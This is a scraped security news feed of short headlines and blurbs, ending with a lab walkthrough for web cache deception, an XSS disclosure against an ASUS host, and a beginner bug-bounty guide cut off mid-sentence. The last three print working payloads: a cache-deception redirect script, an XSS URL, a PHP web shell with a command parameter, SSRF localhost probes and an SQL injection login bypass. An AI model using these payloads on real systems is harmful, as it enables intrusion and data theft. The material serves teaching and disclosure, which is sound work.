to identify and address potential security weaknesses. Ensure that all updates and patches are applied in a timely manner. Conclusion The recent CERT-In advisory and the emergence of the WikiLoader malware campaign highlight critical vulnerabilities and evolving cyber threats. The identified vulnerabilities in Palo Alto Networks applications and the sophisticated tactics employed by WikiLoader underscore the need for proactive security measures. By addressing the vulnerabilities through timely updates, restricting access, and employing robust defense mechanisms, organizations can significantly reduce the risk of exploitation. Additionally, staying alert against sophisticated malware campaigns and continuously improving security practices are essential for protecting systems and sensitive data. Implementing the recommended actions will help to protect against these risks and enhance the overall security posture. The post CERT-In Advisory and WikiLoader Campaign: Comprehensive Overview of Recent Security Threats appeared first on Cyble.

by CYBLE

The City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature data stolen by a ransomware group

by Malwarebytes Labs

Mobile users in Brazil are the target of a new malware campaign that delivers a new Android banking trojan named Rocinante. ""This malware family is capable of performing keylogging using the Accessibility Service, and is also able to steal PII from its victims using phishing screens posing as different banks,"" Dutch security company ThreatFabric said. ""Finally, it can use all this exfiltrated

by The Hacker News

URL validation bypasses are the root cause of numerous vulnerabilities including many instances of SSRF, CORS misconfiguration, and open redirection. These work by using ambiguous URLs to trigger URL

by PortSwigger Research

A step-by-step guide to backing up Notion notes, and migrating them to free rival apps Obsidian or AFFiNE.

by Kaspersky

Malware authors have iterated on one of the premier encryptors on the market, building something even bigger and better.

by Dark Reading

Understanding through visibility, managing through governance, and anticipating through continuous deployment will better prepare organizations for the next supply chain attack.

by Dark Reading

For Preparedness Month in September, Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, has urged businesses to prepare for the rising tide of cyber threats by prioritising fundamental cybersecurity practices. With more sensitive data being stored online, the risk of breaches and exploitation is at an all-time high.  To defend against the most […] The post September is Preparedness Month appeared first on IT Security Guru.

by IT Security Guru

We deep dive into CVE-2024-27198, also known as the JetBrains TeamCity Multiple Authentication Bypass.

by Hack The Box Blog

The newest version of the Blink Mini features key improvements that make it worthy even for non-budget shoppers.

by ZDNET Security

For those working in the information security and cybersecurity industries, the technical impacts of a data breach are generally understood. But for those outside of these technical functions, such as executives, operators and business support functions, “explaining” the real impact of a breach can be difficult. Therefore, explaining impacts in terms of quantifiable financial figures […] The post Cost of a data breach: Cost savings with law enforcement involvement appeared first on Security Intelligence.

by Security Intelligence

In the digital realm, secrets (API keys, private keys, username and password combos, etc.) are the keys to the kingdom. But what if those keys were accidentally left out in the open in the very tools we use to collaborate every day? A Single Secret Can Wreak Havoc Imagine this: It''s a typical Tuesday in June 2024. Your dev team is knee-deep in sprints, Jira tickets are flying, and Slack is

by The Hacker News

The oil and fracking giant says it is ""working to identify effects"" of the ongoing cyberattack on its oil and fracking operations. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-09-03 12:33:45

Name That Edge Toon: Bug Off

Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.

by Dark Reading

Check Point® Software Technologies Ltd. today introduced its cutting-edge Portal tailored for managed security service providers (MSSPs) and distributors. This innovative platform streamlines service delivery and simplifies the business experience with Check Point. As highlighted by Canalys, the global MSSP market is expected to expand at an annual rate of 14.2%, fueled by rising cyber […] The post Check Point Software Launches New MSSP Portal for Partners: Streamlining Service Delivery and Business Operations appeared first on IT Security Guru.

by IT Security Guru

The European Union’s Disinformation Lab (EU DisinfoLab) has recently exposed a sophisticated Russian influence campaign known as “DoppelGänger.”

by U.S. Cyber Command News

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

by Cisco Talos Blog

Check out the August updates in Compliance Plus so you can stay on top of featured compliance training content.

by KnowBe4

Sooner or later, every IT leader runs into a virtual brick wall. That''s when it''s helpful to have some trusted colleagues to turn to for advice and support.

by ITPro Today

Private companies must prioritize digital inclusivity to enhance user experience, protect their reputation, and tap into a broader customer base.

by ITPro Today

Crushing FUD: Embracing Ethical Hackers to Strengthen Cybersecurity Antoine Willia… Tue, 09/03/2024 - 07:58 Body What is FUD?Fear, Uncertainty, and Doubt (FUD), are central blockers to high-efficacy security programs by creating a climate of fear and hesitation, which impedes effective decision-making and proactive measures. The primary goal of FUD is to create anxiety and distrust, which can lead to paralysis in security operations and a defensive rather than a proactive mindset.Examples of FUDHackers Using Reports as Leverage: Companies may worry that hackers will make sensitive security reports public without consent, potentially exposing vulnerabilities before they can be mitigated. Cybercriminals may threaten to release or withhold critical security findings unless a ransom is paid, leveraging fear to coerce companies into compliance.Knocking Assets Offline: The fear of attackers taking critical assets offline or causing general product disruption can paralyze decision-making and lead to overly conservative security practices.Seeing Hackers as Criminals: The stereotype of hackers as solely malicious actors creates fear and mistrust, hindering collaboration with ethical hackers and security researchers.Lack of Trust: General distrust within the security community, whether towards software vendors, security solutions, or even internal teams, exacerbates uncertainty and hinders cooperation.Being Overwhelmed with New Vulnerabilities: The rapid influx of new vulnerabilities can overwhelm security teams without a proper triage, escalation, and remediation process, leading to a sense of helplessness.Exceeding Engineering Capacity to Remediate Vulnerabilities: When the volume of vulnerabilities outpaces the ability of engineering teams to address them, it can create fear of inevitable breaches and system failures.Brand Damage: The fear that any security incident, no matter how minor, will cause irreparable damage to a company’s reputation can lead to excessive risk aversion.Legal Ramifications: Concerns about the legal consequences of breaches, including fines and regulatory actions, can cause a team to create more roadblocks for ethical hackers during testing.Why FUD is Hindering Security Programs FUD significantly hinders cybersecurity programs by creating a paralyzing environment where decision-makers become overly cautious, leading to delays in implementing necessary security measures. This fear-driven inaction leaves organizations vulnerable to preventable attacks. Additionally, FUD often results in the misallocation of resources, as companies may invest heavily in less effective security measures out of fear, diverting critical resources away from more impactful solutions. The pervasive sense of fear and uncertainty erodes trust within the organization and with external partners, hampering collaboration and information sharing that are essential for effective cybersecurity.Moreover, the constant pressure of dealing with FUD can lead to burnout and low morale among security professionals, decreasing overall productivity and effectiveness. This environment stifles innovation, as fear of potential vulnerabilities in new technologies can lead to resistance against adopting innovative solutions, leaving organizations behind in security advancements. Ultimately, FUD fosters a reactive rather than proactive security posture, where organizations respond to threats as they arise instead of preparing for and mitigating potential risks. To overcome these challenges, it is crucial to cultivate a culture of trust, transparency, and collaboration, replacing FUD with informed, strategic decision-making to enhance the overall security posture.Combatting FUD: The HackerOne Journey HackerOne’s solution effectively crushes FUD by guiding customers through a comprehensive security journey. It begins with penetration testing (pentest) to identify and report initial vulnerabilities, providing a clear understanding of potential threats. Following this, we implement a Vulnerability Disclosure Program (VDP), which serves as a public channel for ethical hackers to submit bugs, ensuring continuous monitoring and improvement. The journey then progresses to a private Bug Bounty Program, incentivizing ethical hackers to uncover more critical and impactful vulnerabilities within your product. This holistic approach not only enhances your security posture but also addresses and mitigates common sources of customer FUD by fostering transparency, collaboration, and proactive risk management.Researching Crowd-Sourced Vulnerability TestingWhat is a VDP and a BBP?VDP (Vulnerability Disclosure Program): A VDP is a public intake process intended to give ethical hackers directions on how and where to report a vulnerability in an organization’s systems. It ensures that vulnerabilities are identified and mitigated before they can be exploited. VDPs are often called the “see something, say something” safey net of the internet. BBP (Bug Bounty Program): A BBP is similar to a VDP but offers monetary rewards to ethical hackers who identify and report security flaws in an organization’s digital assets. This incentivizes more thorough testing and timely disclosure of vulnerabilities. BBPs have the option to be private or public, where you can choose which will work best for you.What is Hacker-Powered Testing?Hacker-powered testing leverages a global community of skilled security researchers to identify vulnerabilities in organizations’ systems. By tapping into the collective expertise of ethical hackers, organizations can uncover security flaws that might go unnoticed by traditional security assessments.Why Add Crowd-Sourced Testing to Your Security Posture?Broader Coverage: Access a diverse pool of researchers with varied expertise.Continuous Improvement: Ongoing testing and feedback help maintain a robust security posture.Cost-Effective: Pay for valid vulnerability reports, reducing overall security costs.Enhanced Innovation: Leverage innovative approaches from the hacker community to discover unique vulnerabilities.Getting Organizational Buy-in for Bug Bounty and VDPBefore diving into crowd-sourced testing, it’s crucial to get buy-in from key stakeholders within your organization:TeamMethod of SocializationEngineeringHighlight the benefits of receiving detailed, actionable reports from skilled hackers, which can streamline the remediation process.LeadershipEmphasize the strategic advantages, such as meeting compliance requirements and showcasing a proactive security stance to stakeholders.Security TeamDiscuss how crowd-sourced testing complements existing security measures, providing an additional layer of defense.Starting with a Hacker-Powered PentestKick off your journey with a Hacker-Powered Pentest:Clear Compliance Needs: Ensure your organization meets regulatory requirements by identifying and mitigating vulnerabilities.Dip Your Feet into Ethical Hacking: Gain firsthand experience working with ethical hackers in a controlled environment.Report to Leadership: Share the positive results and insights gained from the pentest to build support for further testing.Make the Case for Additional Testing: Use the success of the initial pentest to advocate for more extensive crowd-sourced testing programs.Building Up to a Public VDPOnce you’ve established initial trust and familiarity with the hacker community, transition to a Public VDP:General Attack Surface Coverage: Broaden the scope of testing to include all publicly accessible assets.Responsible Disclosure: Provide a formal channel for hackers to report vulnerabilities responsibly.Community Interaction: Learn to engage with the hacker community and address their findings effectively.Cost-Effective Discovery: Identify low-hanging fruit at a lower cost than traditional methods.Running a HackerOne ChallengeIn parallel, run a HackerOne Challenge to stress-test specific assets:Targeted Testing: Focus on a particular asset or feature during a time-bound event.Security Maturity Assessment: Evaluate the security readiness of assets before wider testing.Cost Reduction: Identify and fix vulnerabilities pre-deployment, reducing overall bounty payments.Build Familiarity: Develop rapport with a group of hackers and learn best practices for running a successful program.Initiating a Private Ongoing Bug Bounty ProgramTransition to a Private Bug Bounty Program for continuous coverage:Ongoing Monitoring: Maintain regular security assessments of your assets.Flexibility: Adapt the scope of testing based on evolving security needs.Incentivized Testing: Engage a curated group of hackers to continuously probe for vulnerabilities.Growing to a Public Bug Bounty ProgramFinally, scale up to a Public Bug Bounty Program to maximize coverage:Widest Coverage: Engage the global hacker community for the broadest possible testing.Continuous Improvement: Benefit from ongoing insights and vulnerability reports.Enhanced Reputation: Demonstrate a strong commitment to security by collaborating openly with ethical hackers.HackerOne Is the Ultimate Solution to Dismantle FUDBy methodically leveraging HackerOne’s products, organizations can systematically dismantle Fear, Uncertainty, and Doubt associated with ethical hacking. Embrace crowd-sourced testing, build internal support, and scale your security efforts to create a robust, proactive defense against cyber threats. Together, we can create a safer digital world. To learn more, contact the expert team at HackerOne today.  Excerpt FUD can overshadow proactive collaboration with ethical hackers. Let''s explore how to combat FUD and get organizational buy-in for bug bounty and VDP. Main Image

by HackerOne

Taiwan alleges that Chinese companies are illegally recruiting talent and stealing trade secrets.

by ITPro Today

Kaspersky Global Emergency Response Team (GERT) shares the most interesting IR cases for the year 2023: insider attacks, ToddyCat-like APT, Flax Typhoon and more.

by Securelist

The Navy is testing out the Elon Musk–owned satellite constellation to provide high-speed internet access to sailors at sea. It’s part of a bigger project that’s about more than just getting online.

by WIRED Security News

The company continues to incur expenses related to the attack, but does not expect a material impact. 

by Cybersecurity Dive

Nation-state attacker are exploiting vulnerabilities in products from Check Point Software, Palo Alto Networks and others to attack multiple industries.

by Cybersecurity Dive

This year’s Olympics and Paralympic games have been a showcase of the benefits of preparedness, tenacity, and adaptability in achieving success. Olympians require all of these traits, and more, to operate at the very top of their respective disciplines. However, the psychological impact of going for gold, and carrying the expectations of fans nationwide, can […] The post Simone Biles & Cyber Burnout: A Shared Path to Resilience appeared first on IT Security Guru.

by IT Security Guru

No matter your reason for transitioning from VMware, this comprehensive guide details the key migration processes and tools to consider when moving to an alternative platform.

by ITPro Today

An insider threat can feel a bit like the plot twist in a spy thriller. You know, the moment when the protagonist realises the enemy is not just at the gates but has been inside the house the whole time. Suddenly, all those polite conversations by the water cooler take on a sinister meaning. So, […] The post INSIDER THREAT AWARENESS MONTH: Are you prepared? appeared first on IT Security Guru.

by IT Security Guru

The rise of AI presents both extraordinary opportunities and intimidating challenges in cybersecurity. While AI can easily identify and exploit vulnerabilities, deploying it without robust security measures introduces significant risks. As the technology evolves, many organisations prioritise AI innovation at the expense of security, leaving their systems vulnerable. This underscores the need for established security […] The post The six most dangerous new threats security teams need to know about appeared first on IT Security Guru.

by IT Security Guru

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system''s permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework. ""If successful, the adversary could gain any privileges already granted to the affected

by The Hacker News

This report presents statistics on PC threats for Q2 2024, including data on ransomware, miners, threats to macOS and IoT devices.

by Securelist

The report gives statistics on mobile malware and unwanted software for Q2 2024, including mobile banking Trojans and ransomware.

by Securelist

2024-09-03 08:00:08

IT threat evolution Q2 2024

In this report, Kaspersky researchers explore the most significant attacks of Q2 2024 that used a XZ backdoor, the LockBit builder, ShrinkLocker ransomware, etc.

by Securelist

A 57-year-old man from the U.S. state of Missouri has been arrested in connection with a failed data extortion campaign that targeted his former employer. Daniel Rhyne of Kansas City, Missouri, has been charged with one count of extortion in relation to a threat to cause damage to a protected computer, one count of intentional damage to a protected computer, and one count of wire fraud. He was

by The Hacker News

On August 13, 2024, Microsoft disclosed a critical vulnerability, CVE-2024-38063, as part of its Patch Tuesday updates [1], [2]. This vulnerability affects the TCP/IP protocol, a fundamental communication protocol used for connecting devices on the Internet and enabling services like the World Wide Web and email. With a CVSS score of 9.8 (Critical), this vulnerability is considered critical because it can be exploited remotely and has the potential to be ""wormable,"" meaning it could spread across networks without requiring user interaction. CVE-2024-38063 specifically allows attackers to execute arbitrary code remotely  (RCE) on systems that have IPv6 enabled, which is the default setting on affected systems. This vulnerability impacts a wide range of Windows operating systems, including Windows 10, Windows 11, and Windows Server versions from 2008 through 2022. Organizations are strongly advised to update their systems immediately to prevent the risk of exploitation.

by Picus Security

by ComputerWeekly

<p>1    IntroductionWeb browsers are common targets for many different APTs. Tools like Redline Malware or penetration testing tools such as SharpChrome or SharpChromium steal sensitive data like cookies and saved login…</p>

by TrustedSec

On September 3, 2024, the White House published a report on Internet routing security. We’ll talk about what that means and how you can help.

by Cloudflare

We are excited to announce the release of Goffloader, a pure Go implementation of an in-memory COFFLoader and PE loader. This tool is designed to facilitate the easy execution of Cobalt Strike BOFs and unmanaged PE files directly in memory without writing any files to disk. Goffloader aims to take functionality that is conventionally within […] The post Introducing Goffloader: A Pure Go Implementation of an In-Memory COFFLoader and PE Loader appeared first on Praetorian.

by Praetorian

Realistic workforce exercises are key to implementing predictive defensive operations, raising the cost of adversaries to target and exploit vital infrastructures.

by Hack The Box Blog

Explore industry moves and significant changes in the industry for the week of September 2, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

Threat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said. The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services,

by The Hacker News

Three men in the United Kingdom have pleaded guilty to operating otp[.]agency, a once popular online service that helped attackers intercept the one-time passcodes (OTPs) that many websites require as a second authentication factor in addition to passwords. Launched in November 2019, OTP Agency was a service for intercepting one-time passwords needed to log in to various websites. Scammers would enter the target’s phone number and name, and the service would initiate an automated phone call to the target that alerts them about unauthorized activity on their account.

by Krebs on Security

Broadcom is refocusing VMware as a private cloud technology, updating the company''s core platforms for application delivery.

by ITPro Today

Atomic Stealer is the most popular malware-as-a-service on macOS because of highly active affiliate-driven distribution campaigns and constant feature upgrades.

by ThreatDown

The world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated. In this high-stakes game, security leaders need every advantage they can get. That''s where Artificial Intelligence (AI) comes in. AI isn''t just a buzzword; it''s a game-changer for vulnerability management. AI is poised to revolutionize vulnerability

by The Hacker News

3 Bad Habits Holding You Back from Financial Freedom, Best Things at DEF CON 32, and more...

by Hive Five

Even before Delta came forward, shareholders were looking for their pound of flesh, filing a class action lawsuit against CrowdStrike. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Today’s blog installment brings us to the end of our 30-week journey that covered 30 cybersecurity topics that I felt would be of interest to a wide variety of security practitioners, such as Security Architects, Security Admins, and Security Auditors. I hope everyone found it as helpful as I found it to write.

by SpiderLabs Blog

When you set up a new Windows PC, you can choose from up to four types of user accounts - but your first choice might not be the right one.

by ZDNET Security

The FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate

by The Hacker News

Have you ever noticed that even the most impactful breaches often start with something as simple as a regular user being targeted through a phishing email or a weak password? From there, attackers methodically follow an attack path by dumping credentials, moving laterally across the network, escalating privileges, and eventually gaining domain administrator access. In other words, rather than relying on an extremely sophisticated single-shot technique, these attacks unfold like a domino effect, where each step paves the way for the next, leading to a full-scale compromise. This is precisely the kind of attack chain that Picus Attack Path Validation (APV), a cutting-edge automated penetration testing software, is designed to expose and validate, ensuring that these security vulnerabilities are identified before they can be exploited.

by Picus Security

For the latest discoveries in cyber research for the week of 26th August, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES California-based Patelco Credit Union has confirmed a data breach following a ransomware attack resulted in the exposure of sensitive personal information belongs to 726K clients and employees. The compromised data includes names, […] The post 2nd September – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Unit 42 discusses WikiLoader malware spoofing GlobalProtect VPN, detailing evasion techniques, malicious URLs, and mitigation strategies. The post Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant appeared first on Unit 42.

by Palo Alto Networks - Unit42

Analysis of the hacktivist group Head Mare targeting companies in Russia and Belarus: exploitation of WinRAR vulnerability, custom tools PhantomDL and PhantomCore.

by Securelist

Even in 2024, the world is rife with digital paranoia and superstition. Find out if your smartphone really is spying on you, and why incognito mode doesn’t make you invisible.

by Kaspersky

Roblox developers are the target of a persistent campaign that seeks to compromise systems through bogus npm packages, once again underscoring how threat actors continue to exploit the trust in the open-source ecosystem to deliver malware. ""By mimicking the popular ''noblox.js'' library, attackers have published dozens of packages designed to steal sensitive data and compromise systems,"" Checkmarx

by The Hacker News

The evolving world of work can make it hard for young professionals in their first jobs. Here are expert tips to help you succeed.

by ITPro Today

Leveraging the unique skills of neurodiverse individuals can help fill critical talent gaps in the workforce, particularly in IT, by fostering inclusive workplaces that recognize and support diverse cognitive abilities.

by ITPro Today

A list of topics we covered in the week of August 26 to September 1 of 2024

by Malwarebytes Labs

by ComputerWeekly

Successful ransomware attacks against organizations in Asia continue at peak levels in 2024 following a wave of high-profile data breaches last year.

by Dark Reading

APPRENTICE-LABBefore starting, configure FoxyProxy to intercept requests through Burp Suite. Ensure that ‘Intercept’ is turned off in Burp Suite while FoxyProxy is active, so that all requests are logged in the HTTP history. Then, log in to the application using the credentials wiener:peter.Please note that the response will include your API key.LoginGo to Burpuite Proxy > HTTP history, right-click the GET /my-account request and select Send to Repeater.HTTP historyNavigate to the Repeater tab. Modify the base path by adding an arbitrary segment; for example, change the path to /my-account/hanzala. Send the request and observe that you still receive a response containing your API key. This indicates that the origin server abstracts the URL path to /my-account. Additionally, ensure that you receive a 200 response and verify that the request is not cachedRepeater TabAdd a static extension to the URL path, such as /my-account/hanzala.js, and send the request.Observe the response headers for X-Cache: miss and Cache-Control: max-age=30. For example:X-Cache: miss – This indicates that the response was not served from the cache.Cache-Control: max-age=30 – This specifies that if the response were cached, it should be stored for 30 seconds.extension cacheResend the request within 30 seconds. You should notice that the X-Cache header changes to hit, indicating that the response was served from the cache. This suggests that the cache interprets the URL path with the .js extension and has a caching rule for it.cache hitSo Now we Know that our request is cache lets create the exploit.In browser, click Go to exploit server.In the Body section, craft an exploit that navigates the victim user carlos to the malicious URL that you crafted earlier. Make sure to change the arbitrary path segment you added, so the victim doesn’t receive your previously cached response.Click Deliver exploit to victim. When the victim views the exploit, the response they receive is stored in the cache.<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account/hanzalaa.js"</script>exploitNow in Burp Suite, change the path to /my-account/hanzalaa.js. Since Carlos''s response is stored in the server cache, this request will return the same response. Send the request to retrieve Carlos''s API key. Copy it.Carlos APIClick Submit solution, then submit the API key for carlos to solve the lab.SolvedWe are done great job everyone! 👏Writeup: Path mapping for web cache deception @ PortSwigger Academy was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

A few months ago, during a routine security assessment, I uncovered a significant cross-site scripting (XSS) vulnerability in the ASUS Laravel Ignition debugging tool. This vulnerability, identified as R-XSS, posed a high risk due to the potential for unauthorized script execution in users’ browsers. Here’s how I discovered and explored this vulnerability.The DiscoveryWhile examining the target, I noticed that the Laravel Ignition debug mode was enabled on adam.asus.com, and the endpoint was vulnerable to XSS. The vulnerability was exposed through the following URL:Vulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert(''cappriciosec.com'')%3EWhen accessing this URL, the embedded script was executed in the user’s browser, confirming the presence of an XSS vulnerability.Understanding the VulnerabilityBug Name: R-XSSBug Priority: HighVulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert(''cappriciosec.com'')%3EImpactThe impact of this XSS vulnerability depends on the application’s context and the privileges of the compromised user. For example:Minimal Impact: In applications with public information, the impact might be negligible.Serious Impact: In applications handling sensitive data, such as financial transactions or healthcare records, the impact could be severe, allowing unauthorized access to private information.Critical Impact: If a user with elevated privileges is compromised, the attacker could gain full control of the application, affecting all users and data.Steps to ReproduceTo confirm the vulnerability, follow these steps:Access the Vulnerable URL: Open the URL in your browser: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert(''cappriciosec.com'')%3EObserve the Script Execution: The script will execute in your browser, displaying an alert with the text cappriciosec.com.Automating the HuntTo streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:ToolPOC: laravel-ignition-rxss on githubpip install laravel-ignition-rxss laravel-ignition-rxss --chatid <YourTelegramChatID>To Check a Single URL:laravel-ignition-rxss -u http://mytargetprogram.comTo Check a List of URLs:laravel-ignition-rxss -i urls.txtRemediationTo mitigate this vulnerability, it is essential to disable debug mode by setting APP_DEBUG to false in the environment configuration. This will prevent unauthorized script execution and protect users from potential XSS attacks.POC by: @karthithehackerMail: contact@karthithehacker.comWebsite: https://www.karthithehacker.com/If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.For enrolling my cybersecurity and Bugbounty course,WhatsApp +91 82709 13635.Connect with me:Twitter: https://twitter.com/karthithehackerInstagram: https://www.instagram.com/karthithehacker/LinkedIn: https://www.linkedin.com/in/karthikeyan--v/Website: https://www.karthithehacker.com/Github : https://github.com/karthi-the-hacker/npmjs: https://www.npmjs.com/~karthithehackerYoutube: https://www.youtube.com/@karthi_the_hackerThank youKarthikeyan.VA Story About How I Found XSS in ASUS was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Passwd is a file where information related to the user is stored such as name, user id, group id,gecos field, home directory, and command…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Understanding the Dark Web: Myths vs. RealityContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Update on meContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Problem:Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

IntroductionWelcome to the thrilling world of bug bounty hunting — where finding glitches in software is not just a hobby but a gateway to potential riches and recognition! Imagine being a digital detective, solving mysteries that most folks wouldn’t even notice, and getting rewarded for it. In this guide, we’ll unravel the basics of bug bounty hunting, give you a step-by-step walkthrough of unearthing common vulnerabilities, and share some nifty resources to get you started. Buckle up, it’s going to be a bug-tastic ride!What is Bug Bounty Hunting?Bug bounty hunting is like being a superhero in the realm of cybersecurity, but without the flashy suit. It involves sniffing out and reporting security vulnerabilities in systems, apps, or websites. Companies run bug bounty programs to lure ethical hackers (like you) into spotting and reporting these weak spots, which helps them beef up their security. In return, you get rewards, recognition, or at least a virtual high-five from the tech community.Step 1: Learn the Basics of Web SecurityBefore you start hunting bugs, you need to get comfy with the basics of web security. Think of it as learning the ABCs of cyber sleuthing.HTTP & HTTPS: These are like the postal services of the web. HTTP is the standard protocol, while HTTPS is its secure cousin that encrypts data between the browser and the server. Always go for HTTPS — it’s like wearing a seatbelt on the web.OWASP Top 10: This is your cheat sheet to the top 10 web security risks. Familiarize yourself with these troublemakers:SQL Injection (SQLi): When hackers play with your database like it’s a toy.Cross-Site Scripting (XSS): When bad scripts crash the party on your website.Broken Authentication: When your login system is as secure as a paper lock.Sensitive Data Exposure: When your private info goes public like it’s on a billboard.XML External Entities (XXE): When your XML files are sneaky troublemakers.Broken Access Control: When users access more than they should, like breaking into the VIP section.Security Misconfiguration: When your security settings are as mixed up as a puzzle.Cross-Site Request Forgery (CSRF): When attackers make your site do things it shouldn’t.Insecure Deserialization: When data being processed gets all messed up.Using Components with Known Vulnerabilities: When using outdated parts is like bringing a leaky bucket to the party.Networking Basics: Learn how IP addresses, DNS, and data travel over networks. It’s like understanding how letters get to your mailbox, but with a lot more technical mumbo jumbo.Step 2: Get Familiar with Tools of the TradeEvery superhero needs their gadgets, and for bug bounty hunting, you’ve got some cool tools:Burp Suite: Think of it as your magnifying glass for HTTP requests and responses. It’s powerful and comes in a community edition if you’re just starting out. Check out the Burp Suite Community Edition and Burp Suite Tutorial for Beginners.Nmap: Your go-to tool for scanning networks and discovering open ports. It’s like your radar for finding weak spots. Explore the Nmap Official Site and Nmap Tutorial for Beginners.OWASP ZAP: An open-source security scanner that helps you spot vulnerabilities. It’s like having a sidekick that never sleeps. Check out the OWASP ZAP Official Site and the OWASP ZAP User Guide.Google Dorking: Use advanced search operators to dig up information exposed on the internet. It’s like using a super-powered search engine to find hidden gems. Read up on Google Dorking Guide.Step 3: Choose a Bug Bounty PlatformNow, where do you actually hunt these bugs? Here are some platforms where you can get started:HackerOne: The big leagues with programs from major companies. Check out HackerOne and their Beginner’s Guide.Bugcrowd: Another top platform with various programs to explore. Visit Bugcrowd and Bugcrowd University.Synack: A more exclusive platform with an application process. Head over to Synack if you’re feeling fancy.Open Bug Bounty: Focuses on responsible disclosure even if you don’t have a formal program. Check out Open Bug Bounty.Step 4: Finding Vulnerabilities — Step-by-Step ExamplesLet’s put on our detective hats and dive into some classic vulnerabilities:Example 1: Cross-Site Scripting (XSS)XSS is like a prankster who injects malicious scripts into web pages. Here’s how to catch them:Identify Input Fields: Look for places where you can type stuff — search boxes, comment sections, or profiles.Inject Test Script: Drop a simple script like:<script>alert(''XSS'')</script>into the input field and hit submit.Check for Execution: If you see an alert box popping up, you’ve found an XSS vulnerability. Congrats!Report the Vulnerability: Describe your findings in a report — explain how you did it, the impact, and offer suggestions for fixing it. It’s like writing a detective’s report.Example: Testing a search fieldEnter <script>alert(''Test'')</script> in the search box.If an alert box appears, it’s an XSS vulnerability.Example 2: Remote Code Execution (RCE)RCE is when hackers can run commands on a server from afar. Here’s how to find it:Find User Input: Look for places where users can upload files or enter commands.Test File Uploads: Upload a file with an extension for executable code, like .php or .asp. Try this payload:<?php system($_GET[''cmd'']); ?>Execute Command: Access the uploaded file via the web and pass a command using URL parameters. For example: http://example.com/uploads/yourfile.php?cmd=lsObserve Output: If the command runs and you see the output, the server is vulnerable to RCE.Report the Vulnerability: Detail how you uploaded the file, executed the command, and the potential impacts.Example: Upload a PHP fileUpload a file named shell.php with the content <?php phpinfo(); ?>.Access it via http://example.com/uploads/shell.php to see if it executes.Example 3: Server-Side Request Forgery (SSRF)SSRF is when an attacker tricks the server into making requests to internal resources. Here’s how to sniff it out:Identify URL Parameters: Look for parameters that accept URLs or IP addresses.Inject Malicious URL: Test with URLs pointing to internal resources, like:http://localhost/admin http://127.0.0.1Observe Response: Check if the server returns data from the internal URL.Report the Vulnerability: Explain how you injected the URL, the responses you observed, and potential impacts.Example: Manipulate a URL parameterChange a parameter like http://example.com/fetch?url=http://localhost to other internal addresses.Example 4: SQL Injection (SQLi)SQL Injection (SQLi) involves injecting malicious SQL queries into an application to manipulate the database. Here’s how to test for SQLi:Identify Input Fields: Find fields where you can input data that interacts with a database, such as login forms or search bars.Inject SQL Payload: Use SQL injection payloads to test the input fields. For example:'' OR ''1''=''1Observe Response: If the application returns unexpected results or database errors, it may be vulnerable to SQLi.Report the Vulnerability: Provide details of the injection, the responses, and potential impacts.Example: Testing a login form:Enter admin'' OR ''1''=''1 as the username and password. If it logs you in, the site is vulnerable.Step 5: Learn From the CommunityEngaging with the bug bounty community can enhance your skills and knowledge:Write-Ups: Reading write-ups from experienced hunters can provide insights into different techniques and approaches. Websites like Hack The Box Write-Ups offer valuable information.Forums and Discord Channels: Join forums and Discord channels for bug bounty hunters. These platforms are great for asking questions and sharing knowledge.Bugcrowd ForumHackerOne CommunityBlogs and Videos: Follow cybersecurity blogs and YouTube channels for updates and tutorials.Security WeeklyThe Bug Bounty HubLiveOverflow’s YouTube ChannelAdditional Tips for Bug Bounty HuntingUnderstand the Scope: Each bug bounty program has a defined scope that specifies which applications, domains, or functionalities are in scope for testing. Always read and follow the program’s rules to avoid testing unauthorized areas.HackerOne Scope Policy2. Stay Updated: The cybersecurity landscape is always evolving. Keep up with the latest vulnerabilities, tools, and techniques by following industry news and updates.CVE DetailsExploit Database3. Practice Ethically: Always use your skills responsibly. Respect the rules of each bug bounty program and avoid causing harm to systems or users.4. Document Everything: Keep detailed records of your findings, including the steps to reproduce the vulnerability, the impact, and any mitigation advice. This will help you write better reports and communicate effectively with program managers.5. Use Automation Wisely: While automated tools can help identify vulnerabilities, manual testing is crucial for discovering complex issues. Use automation as a supplement, not a replacement for manual analysis.Example Scenarios: Bug Bounty Hunting in ActionScenario 1: Finding XSS on a Search PageStep-by-Step Example:Navigate to the Search Page: Open the search page of the target application.Test Input Fields: In the search box, input <script>alert(''XSS'')</script>.Submit and 